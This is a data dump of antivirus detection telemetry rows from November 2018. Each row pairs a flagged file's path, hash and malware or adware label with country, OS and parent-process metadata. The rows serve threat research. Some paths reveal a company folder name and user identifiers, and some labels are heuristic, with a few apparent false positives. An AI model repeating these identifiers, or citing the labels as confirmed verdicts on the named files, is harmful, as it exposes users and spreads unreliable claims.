  Row(detection=Row(filename='62nkb2wm.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\62nkb2wm.exe', filesize=128000, name='HEUR/AGEN.1035695.#M1.#R1'), hash='87360561a5460d89112d64b3826081504b230c64f9f43eeac66157b4d0c341ed', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:06:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cop.dll', filepath='D:\\GerdooYar e-Learning\\GerdooYar Photoshop\\tech\\Cop.dll', filesize=1024000, name='TR/Crypt.XPACK.Gen3.#M300.#R200121'), hash='c1320620a503052ee9b43c4eb169b7903e93f24621c91669c59dbc29661671b5', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='D:\\GerdooYar e-Learning\\GerdooYar Photoshop\\autorun.exe', parentsize=2939392, timestamp='2018-11-04T15:01:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-110320-b2dcfbf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b3d82604\\AVSCAN-20181104-110246-AC86BAA1\\AVSCAN-20181104-110320-B2DCFBF0', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:05:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d572d458c354957a19725df379a4f84f1ac865e23c54f38e10e8281fde070ba0', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T19:31:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kotl.exe', filepath='F:\\kroer\\kotl.exe', filesize=128000, name='TR/Patched.Ren.Gen.#M300.#R3912'), hash='e9ff15ec5523d7dd573c7d5e83eaf453a5549fd486fcff5a54ab915609dfa6a7', metadata=Row(cmdline=None, country='AL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-02T20:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103320-40ac01b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52e373a3\\AVSCAN-20181102-092201-B325F22F\\AVSCAN-20181102-103320-40AC01B8', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:28:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00008d2f', filepath='C:\\Windows\\Temp\\44ef8ec5-a22f-4cfe-9da7-71338354ecd9\\tmp000004f2\\tmp00008d2f', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='cd217ac276c1b7fe59663bfd4d8899239527c522c0b38fd8f553d6c119c8a87c', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.930.11587\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:05:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_20.htm', filepath='C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\TANTO CITRA MANDIRI Team Folder\\Campur2\\File Epson\\Manual\\SetupGuide\\ID\\setup_20.htm', filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='97c3cfb8f724d4870e4ab825455e50808e5175c672e2688ebd4b18ca13fc24b5', metadata=Row(cmdline='\\\\\\/systemstartup', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-02T07:29:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nladminpro.exe', filepath='E:\\Programas1\\Network.LookOut.Administrator.Professional.v2.6.7\\Crack\\NLAdminPro.exe', filesize=640000, name='W32/Neshta.A.#M1.#R1'), hash='d10c6f13c24d5a4fb4b478bda9f08b4387ad4e770b72db3cb2b1c007d90108a5', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='I:\\PROGRAMAS\\PNGoo.0.1.1\\PNGoo.exe', parentsize=91136, timestamp='2018-11-02T04:18:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='littleha.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\LITTLEHA\\LITTLEHA.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a49054639c4bd928956e159059359ef7acba9d28e739b00f44268e314ca03514', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A49054639C4BD928956E159059359EF7ACBA9D28E739B00F44268E314CA03514', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a49054639c4bd928956e159059359ef7acba9d28e739b00f44268e314ca03514', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:43:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='riblqhsl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\RiBLQhSl.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:06:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00837e90', filepath='C:\\Windows\\TEMP\\tmp000045f2\\tmp00837e90', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-02T21:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='¦+¦¦+¿+-1.23.exe', filepath='C:\\Users\\X\\Desktop\\C_8_To-Disk-2\\CEHv8 Module 06 Trojans and Backdoors\\Miscellaneous Trojans\\Daodan v1.23\\¦+¦¦+¿+-1.23.exe', filesize=256000, name='BDC/Daodan.123.Cli.#M1.#R1'), hash='c8ad280e8657b9c87fa431ab22c5f850af7fb469ca017d8c5de491cdb78452c5', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\EC-Council Certified Ethical Hacker CEH v8 (Tools)\\\\\\\\EC-Council.Certified.Ethical.Hacker.CEH.v8.Tools.DVD2\\\\\\\\C_8_To-Disk-2.iso\\\\\\"', country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1551248, timestamp='2018-11-02T13:51:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658e7f', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658e7f', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pesbbnla.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\pesBBNla.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bqbd.exe', filepath='c:\\users\\X\\appdata\\roaming\\bqbd.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=431616, timestamp='2018-11-02T20:30:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='b2a0c2feea8abe89a36b13a281b7d15f66e1de4b06402f733f424a0be7a5b3c2.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\B2A0C2FEEA8ABE89A36B13A281B7D15F66E1DE4B06402F733F424A0BE7A5B3C2.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b2a0c2feea8abe89a36b13a281b7d15f66e1de4b06402f733f424a0be7a5b3c2', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:48:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libeay32.dll', filepath='e:\\crazykart\\libeay32.dll', filesize=1024000, name='W32/Ramnit.C.#M1.#R1'), hash='83ffe90ba855aecdf5bfc2f21b2708fedd9bde7ea94f8ce25d6cf6abb563c12c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:06:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='b6ac5e99453b4ef042f7270d4e7769560b61d224224b645a8db65024984450f2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nshBDA6.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T09:07:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d04e', filepath='C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d04e', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ESTsoft\\ALYac\\AYRTSrv.aye', parentsize=624192, timestamp='2018-11-02T05:08:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082917-a2d6226f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7a50dcda\\AVSCAN-20181102-082637-921A2E95\\AVSCAN-20181102-082917-A2D6226F', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='be2973225aeea112324261ea47eefecffcf932402940f8c860213cb0c52e6569', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:29:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000762c', filepath='C:\\Windows\\Temp\\4ddbcd79-8649-4c16-8602-00b708d4cfb4\\tmp0000036d\\tmp0000762c', filesize=14272000, name='TR/Crypt.XPACK.Gen2.#M300.#R100736'), hash='d09df837973a1935b6cdb696903b2f8642d12f637723fa563a1f3ed39a276042', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.10.767.8917\\AdAwareService.exe', parentsize=712432, timestamp='2018-11-02T10:03:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL12\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='a7a0fd00806114fe7d21a90490249b6cf7a2850ba6b44579093c538d5ff6d9d0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL10\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='f2522a4e8d7e1f0554f0d7a8a6420b78a1aaf0543838282afb2a55d3a5d9b3f3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libegl.dll', filepath='\\\\?\\C:\\Program Files\\chroomium Browser\\chroomium\\libegl.dll', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:08:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-024334-68420019', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-024334-68420019', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='cae8e744aef46779873844c5a4e2e388c78494a08167ef766ad7f668a7aa7697', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:45:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_16902978.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_16902978.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:05:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instmsiw.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\instmsiw.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='b0dc31bd73c67f690775047ff0ba3bba16a49474383cec166fa822e0049e63a0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe803_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe803 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T02:45:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090138-ca92f7f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cdbb2d48\\AVSCAN-20181102-085645-A00F5F29\\AVSCAN-20181102-090138-CA92F7F2', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='9e3d68102514cb64cce77a8645febc9ea6b04533ea84773741299666deb52220', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libegl.dll', filepath='\\\\?\\C:\\Program Files (x86)\\chroomium Browser\\chroomium\\libegl.dll', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='AF', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:27:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-135144-768d5b8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-135144-768D5B8A', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239f1d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239f1d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:51:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d91f930ab16122533e4b3af12556296ce2ee17585d0261932587be8ea6613ab4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D91F930AB16122533E4B3AF12556296CE2EE17585D0261932587BE8EA6613AB4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d91f930ab16122533e4b3af12556296ce2ee17585d0261932587be8ea6613ab4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:58:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291b25', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291b25', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:57:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='faq-content.html', filepath='C:\\Program Files\\CSR\\CSR Harmony Wireless Software Stack\\HelpFiles\\de-de\\faq-content.html', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b897283448f7168fb1e2cbeaf6d332fae286ae585158fbfc6f52ce78b2895ed2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T01:52:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gclaw.exe', filepath='D:\\العاب حسين\\Claw\\gCLAW.EXE', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='f82c8ecd9f5b050b902d7d15f483d434b236ef766cfc036febb2fdc28d6de746', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:3okSyQarvEivO1iB.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T14:12:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133815-db90996b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133815-DB90996B', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:38:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=18000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='badd0938ca813893451a230bac0664eede1f1a558e9999daca8c27ec099fe295', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-04T16:04:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='115059913.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\115059913.exe', filesize=35056000, name='WORM/Alien.uqiib.#M1.#R1'), hash='c7ac889a8307930552202d90b7871bbaf0f0ed667230632d69dc2b994c033383', metadata=Row(cmdline='\\\\\\/DB', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-04T03:51:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{8930E7E4-F80B-4737-8CD5-CC87752F0EA8} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T13:24:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002922e9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002922e9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:06:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:38:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-26-004702/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:32:29Z'), dt=datetime.date(2018, 11, 4)),
